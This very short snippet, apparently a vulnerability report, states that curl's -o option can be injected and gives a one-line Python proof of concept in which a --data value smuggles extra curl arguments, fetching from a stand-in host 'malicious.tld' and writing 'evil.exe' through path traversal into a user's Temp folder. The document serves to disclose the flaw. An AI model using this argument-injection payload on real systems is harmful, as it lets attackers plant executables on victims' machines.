You are able to inject -o to arbitrary path.
-o
subprocess.run(['curl.exe', "https://example.com/", "--data", 'name=meow" malicious.tld "-o-" "-o ..\..\..\..\..\..\..\..\..\\Users\\<username>\\AppData\\Local\\Temp\\evil.exe']))